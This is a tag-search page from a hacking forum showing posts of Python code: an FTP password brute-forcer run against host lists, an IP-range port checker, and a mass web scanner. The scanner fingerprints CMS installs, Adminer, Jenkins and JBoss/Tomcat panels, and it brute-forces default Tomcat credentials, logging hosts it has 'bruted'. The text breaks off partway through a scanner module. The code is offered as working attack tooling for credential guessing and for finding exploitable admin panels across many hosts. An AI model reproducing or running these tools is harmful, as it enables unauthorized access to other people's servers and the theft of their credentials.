Jump to content
×
×
  • Create New...

Search the Community

Showing results for tags 'python3'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • HOME
    • Shell_Meet
    • Shell_Talk
    • Board Meet
    • Announcements and Updates
    • Shell_Update
    • Pending Approvals
    • Member Introductions
    • Shell_Crew Support
  • HACKING & EXPLOITATION
    • Ctf Updates & Walkthroughs
    • Latest CVE-Info
    • Android/IOS Pentesting
    • Reverse Engineering
    • IoT Exploitation
    • Malware Analysis
    • API Pentesting
    • Cloud Security
    • Off-topic Lounge
  • CAREER
    • Internships
    • Career Discussion
    • Mentorship
    • Career Guidance
  • BUG BOUNTY
    • P5 (Informational Bugs)
    • P4 (Low-Level Bugs)
    • P3-P2 (High-Level Bugs)
    • P2-P1 (Critical Bugs)
    • Vulnerability Chaining
    • Report Writing
    • Personal Hunting Methodology
  • PROGRAMMING
    • Front-End Development
    • Scripting
    • Backend-Development
    • Application Development
    • Linux Kernel and OS Developers
    • Hardware Programming
    • DevOps
    • Queries Assessment
  • PROFESSIONAL CYBERSEC
    • Penetration Testing (Risk Assessment)
    • Red Teaming (Risk Assessment)
    • Blue Teaming (Risk Assessment)
    • Exploit Development (Risk Assessment)
    • OSINT-External and Internal (Threat Intelligence)
    • IOC (Threat Intelligence)
    • Awareness (Reinforcement)
    • Digital Forensics (Security Operations)
    • SOC & SIEM
  • Bug-Hunters's Resources
  • Open Source Contribution's Topics
  • Pentesting's Resources
  • SDR & AutoMobile Pentesting's Topics
  • Networking's Topics
  • Networking's Network Resources

Blogs

  • Open Source Contribution's Blogs

Categories

  • Bug-Hunt
  • Penetration Testing
  • Blue-Teaming

Product Groups

There are no results to display.

Categories

  • Pentesting
  • Bug-POC Videos
  • CTF-Walkthrough
  • Scripting
  • Bug-Hunters's Videos
  • SDR & AutoMobile Pentesting's Videos
  • Networking's Videos

Categories

  • Pentesting
  • Bug-Hunting
  • SDR & AutoMobile Pentesting's Tutorials

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 12 results

  1. #!/usr/bin/python3 """ FTP-Bruteforcer 4 FXP-TERMiNAL.iNFO by SpliTerZ.tw!XX Faster than an ICE """ import socket import sys import threading import time def CheckForLogin(target,username,password): sock = socket.socket() sock.settimeout(0.45) try: server = (target,21) user = "USER "+username+"\r\n" pwd = "PASS "+password+"\r\n" sock.connect(server) sock.recv(4096) sock.sendall(user.encode()) sock.recv(4096) sock.sendall(pwd.encode()) answer = sock.recv(4096).decode('utf-8') if "230" in answer: open('bruted_ftp','a').write(target+":21 "+username+":"+password+"\n") print("[x][x][x][x][x] Success on IP: "+target+"![x][x]\n") sock.recvmsg(4096) elif "530" in answer: sock.close() sock.close() except: print("Login failed!\n") pass if sys.argv[1]: hosts = open(sys.argv[1]).read().splitlines() usernames = sys.argv[2].split(",") passwords = open(sys.argv[3]).read().splitlines() for host in hosts: for user in usernames: for password in passwords: T = threading.Thread(target=CheckForLogin,args=(host,user,password,)) if threading.active_count() <= int(sys.argv[4]): T.start() else: time.sleep(0.3) T.start() T.join() exit() Usage: python/python3 ftp-brute.py hostlist.txt user1,user2,user3,user4,... passwords.txt threadcount
  2. import re import struct import socket IPV4PATTERN = re.compile('^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$') class InvalidIPError(Exception): pass class IPV4Range: def __init__(self, start, end): ''' Define an IPV4 Range ''' self.start = _validate_ip(start) self.end = _validate_ip(end) self.current = None def next(self): ''' Returns the next ip for this range Returns None if called after reaching end ''' if self.current != self.end: if self.current is not None: self.current = _increase_ip(self.current) else: self.current = self.start else: return False return self.current @staticmethod def knock_on_port(addr, port, timeout=1): ''' Tries to open current addr on given port Returns a tuple (status, error) Where status is boolean and error is an error string or None ''' try: conn = socket.create_connection((addr, port), timeout) except socket.error as e: return (False, str(e)) conn.close() return (True, None) def _validate_ip(addr): if not IPV4PATTERN.match(addr): raise InvalidIPError('%s is no valid IPv4 Addr.' % addr) return addr def _increase_ip(addr): ''' Claculate the next IP Addr ''' return _long2ip(_ip2long(addr) + 1) def _ip2long(addr): return struct.unpack('!L', socket.inet_aton(addr))[0] def _long2ip(long): return socket.inet_ntoa(struct.pack('!L', long)) SCAN.RAR
  3. #!/usr/bin/python #-*- coding:utf-8 -*- import inspect import re import urllib2 import threading import sys import ssl import requests class read_file_ip(): """ Read File line per line """ def __init__(self, file): try: self.file = open(file, "r+") except: print "[ERROR] Cant open File" self.actual_line = "" def next_line(self): """ Moves the pointer to the next line and returns this """ try: line = self.file.next().rstrip() except StopIteration: line = False except AttributeError: line = False self.actual_line = line return line def actual_line(self): """ Returns actual line, doesnt moves the pointer """ return self.actual_line class tools(): """ Here you can store all functions which you want to use a few times """ @staticmethod def logging(file, value): """ Log something to a file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() @staticmethod def create_http_url(host, port, file = "/", prot = "http"): """ Create Url for Urllib2 """ return "%s://%s:%s%s" %(prot, host, port, file) @staticmethod def http_get(ip, port, file = "", timeout = None, url = None, ssl = False): """ GET HTTP Status Code, html and url from url or ip + file """ if url == None: if ssl == False: prot = "http" else: prot = "https" if port == None: port = 80 if file == None: raise("ERR: func_http_get: no url or file specified") url = "%s://%s:%s%s" %(prot, ip, port, file) if timeout == None: timeout = scan.conf_timeout try: conn = urllib2.urlopen(url, timeout = None) except urllib2.HTTPError as e: return [True, e.code, url, e.read()] except urllib2.URLError as e: return [False, None, None, None] except urllib2.socket.timeout as e: return [False, None, None, None] except requests.exceptions.SSLError as e: return e.message return [True, conn.code, url, conn.read()] @staticmethod def get_string_between(string, start, end): try: end_of_string = string.index(start) + len(start) start_of_string = string.index(end, end_of_string) return string[end_of_string:start_of_string] except: return False @staticmethod def get_http_headers(url, timeout = None): """ Get Http Headers and compare them to dictionary which will be returned """ main_url = url target_headers_dict = {} if timeout == None: timeout = scan.conf_timeout try: target_urllib = urllib2.urlopen(main_url, timeout = timeout) except urllib2.HTTPError as e: return {"Error" : e} except urllib2.URLError as e: return {"Error" : e} except urllib2.socket.timeout as e: return {"Error" : e} except: return {"Error" : "Unknown"} target_headers = target_urllib.info().headers for i in target_headers: i = i.strip() items = i.split(": ") try: target_headers_dict[items[0]] = items[1] except IndexError: print items #Heres some bug but to lazy to fix it ^^ Fixxed with try but no nice code... return target_headers_dict def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None): """ Check if any item from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] for i in blacklist: print i if any(k in string for k in whitelist) and any(k not in string for k in blacklist): return True else: return False def regex_not_match(string, regex): """ Returns True if regex does NOT match, false if it matches. Needed for check_if_any_reg_from_arr_in_string() """ if re.match(regex, string) == None: return True else: return False def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None): """ Checks if any regex from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist): return True else: return False @staticmethod def http_basic_auth(theurl, username, password): passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # this creates a password manager passman.add_password(None, theurl, username, password) # because we have put None at the start it will always # use this username/password combination for urls # for which `theurl` is a super-url authhandler = urllib2.HTTPBasicAuthHandler(passman) # create the AuthHandler opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) # All calls to urllib2.urlopen will now use our handler # Make sure not to include the protocol in with the URL, or # HTTPPasswordMgrWithDefaultRealm will be very confused. # You must (of course) use it when fetching the page though. try: pagehandle = urllib2.urlopen(theurl) except urllib2.HTTPError as e: return [False, e] # authentication is now handled automatically for us return [True, pagehandle.read()] class scan(): """ Class which does the Scanning Part. Here you can also add new scan modules. """ def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them ############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : "unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart and add. paths to exploits ! # by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], "marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : ["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", 